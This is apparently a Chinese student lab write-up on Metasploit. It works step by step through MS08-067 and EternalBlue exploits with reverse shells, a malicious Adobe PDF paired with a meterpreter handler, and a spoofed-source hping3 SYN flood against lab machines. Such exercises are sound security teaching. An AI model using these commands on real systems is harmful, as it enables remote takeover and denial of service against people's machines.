Exp5 MSF基础应用

一、实践概述

1. 实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。实现:

1.1一个主动攻击实践

  • ms08-067+windows/shell_reverse_tcp(成功)

1.2 一个针对浏览器的攻击

  • ms17_010_eternalblue+generic/shell_reverse_tcp(成功)

1.3 一个针对客户端的攻击

  • Adobe+windows/meterpreter/reverse_tcp(成功)

1.4 成功应用任何一个辅助模块

  • dos/tcp/synflood(成功且唯一)

2.基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit:测试者利用系统、程序或服务的漏洞进行攻击的一个过程。
  • payload:攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接、创建用户、执行其他系统命令的功能。
  • encode:一是为了避免使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。

二、实验步骤

任务一 Windows服务渗透攻击——MS08-067安全漏洞

攻击机Kali:10.1.1.169

靶机Win2000:10.1.1.154

payload:windows/shell_reverse_tcp

1.攻击机和靶机改成桥接模式,相互ping通

2.msfconsole进入控制台

search ms08-067查找漏洞

3.如上图,输入use exploit/windows/smb/ms08_067_netapi指令选择漏洞

show options查看设置信息

set RHOSTS 10.1.1.154设置Win2000 IP

search portscan搜索端口

4.如上图,输入use auxiliary/scanner/portscan/tcp选择漏洞

show options查看设置信息

set RHOSTS 10.1.1.154

exploit

看到445端口开放

5.输入use exploit/windows/smb/ms08_067_netapi

show payloads查看可用payload

如上图,输入set payload windows/shell_reverse_tcp选择payload

show options

exploit进行攻击成功


任务二 一个针对浏览器的攻击——ms17-010

攻击机Kali:192.168.43.91

靶机Win7专业版:192.168.43.182

payload:generic/shell_reverse_tcp

1.攻击机和靶机改成桥接模式,关闭防火墙,相互ping通

2.msfconsole进入控制台

search ms17-010查找漏洞

3.如上图,输入use exploit/windows/smb/ms17_010_eternalblue指令选择漏洞

show payloads显示可用攻击载荷

set payload generic/shell_reverse_tcp选择攻击载荷

show options查看配置信息

set LHOSTS 192.168.43.91设置Kali IP

set RHOSTS 192.168.43.182设置Win7 IP

exploit进行攻击成功


任务三 一个针对客户端的攻击——Adobe

攻击机Kali:10.1.1.169

靶机WinXPattacker:10.1.1.194

payload:windows/meterpreter/reverse_tcp

1.攻击机和靶机改成桥接模式,相互ping通

2.msfconsole进入控制台

search adobe查找漏洞

3.如下图,输入use windows/fileformat/adobe_cooltype_sing指令选择漏洞

show payloads显示可用攻击载荷

set payload windows/meterpreter/reverse_tcp

set LHOST 10.0.0.169设置Kali IP

set LPORT 5306 设置攻击端口

set FILENAME 5306.pdf设置生成的pdf文件名

exploit

4.开启一个新终端

cd /root/.msf4/local进入pdf文件保存目录

cp 5306XYH.pdf /mnt/hgfs/XYH把pdf文件复制到与主机的共享文件夹中,再把pdf从主机拖到winXP

5.回到原控制台

back退出当前模块

use exploit/multi/handler 进入监听模块

set payload windows/meterpreter/reverse_tcp

set LHOST 10.0.0.169 设置kali IP

set LPORT 5306 设置攻击端口

exploit 开始监听

6.WinXP中打开5306XYH.pdf

回到Kali发现回连成功


任务四 成功应用任何一个辅助模块

攻击机Kali:10.1.1.169

靶机Win7:10.1.1.113

漏洞:dos/tcp/synflood(唯一)

1.攻击机和靶机改成桥接模式,相互ping通

2.msfconsole进入控制台

show auxiliary命令显示所有的辅助模块以及他们的用途

一眼相中TCP SYN FLOODER

3.SYN Flood攻击原理

  • SYN:同步序列编号(Synchronize Sequence Numbers),是TCP/IP建立连接时使用的握手信号。

  • SYN Flood利用TCP协议缺陷,通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。

  • 攻击原理:通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送syn包,服务器回复确认包,在进行第三次握手时,服务器等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,才将此条目从未连接队列删除。这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求不能进去以及被丢弃,目标系统运行缓慢,引起网络拥堵。

4.Win7下按Ctrl+Alt+Ins启动任务管理器

查看性能,监控CPU的利用率,开启Wireshark抓包

5.Kali中输入hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113

其中5.3.0.6为伪造源IP,5306为伪造源端口,445为目的端口,10.1.1.113为目的IP

6.查看Win7的任务管理器和wireshark抓包结果

如图,Win7的性能利用率已经达到96%并居高不下。Wireshark抓到的包显示大量源地址为5.3.0.6,在给靶机win7发送请求连接,进行SYN Flood攻击。综上表明已经攻击成功。

7.Kali中按Ctrl+C结束攻击

查看Win7的任务管理器,性能利用率恢复正常。

20165306 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. Linux —— 命令

    Linux —— 命令 各种查看 查看文件绝对路径 pwd 查看某服务占用端口 netstat -ano |grep mysql Linux 下的复制粘贴 0.在KDE/Gnome下: 复制命令:Ct ...

  2. Centos7 初始化硬盘分区、挂载

    1.通过命令fdisk-l查看硬盘信息 可以看到有两块硬盘/dev/vda和/dev/vdb,启动vda是系统盘vdb是我们新增的数据盘. 2.执行以下命令,进入fdisk模式,开始对新增数据盘执行分 ...

  3. Centos7安装jexus,部署asp.net core,asp.net mvc

    什么是Jexus 官网解释:https://www.jexus.org/ Jexus是一款Linux平台上的高性能WEB服务器和负载均衡网关,Jexus Web Service,简称JWS,以支持AS ...

  4. java代码审计中的一些常见漏洞及其特征函数

    文章来源:https://xz.aliyun.com/t/1633 最近在先知上看到之前有篇关于java代码审计的文章总结的蛮好,记录以下特征函数,方便查阅,同时自己也会将在平时代码审计过程中积累的函 ...

  5. 记一次Linux服务器因redis漏洞的挖矿病毒入侵

    中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱. 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!! ...

  6. WEB服务器,TOMCAT和servlet之间的关系

    WEB服务器,TOMCAT和servlet之间的关系 什么是WEB服务器Web服务器是指能够为发出请求的浏览器提供文档的程序.服务器是 一种被动程序,只有浏览器发出请求的时候才会响应.应用层使用 的是 ...

  7. SSM框架和SSH框架的区别

    SSH和SSM定义 SSH 通常指的是 Struts2 做控制器(controller),spring 管理各层的组件,hibernate 负责持久化层. SSM 则指的是 SpringMVC 做控制 ...

  8. [阿里云] 云数据库mongodb外网连接

    原教程,https://www.alibabacloud.com/help/zh/doc-detail/55253.htm 但按照这里的教程,还是连不上mongdb,甚至在ECS上也ping不通mon ...

  9. Android配置AndroidAnnotations注解框架配置

    1在新建的普通项目里面,新建一个compile-libs文件夹,将下载来的androidannotation-xx.jar添加到compile-libs文件夹下,将androidannotation- ...

  10. LoadXml 加载XML时,报错:“根级别上的数据无效。 行1,位置1“

    ==XML=================================== <?xml version="1.0" encoding="utf-8" ...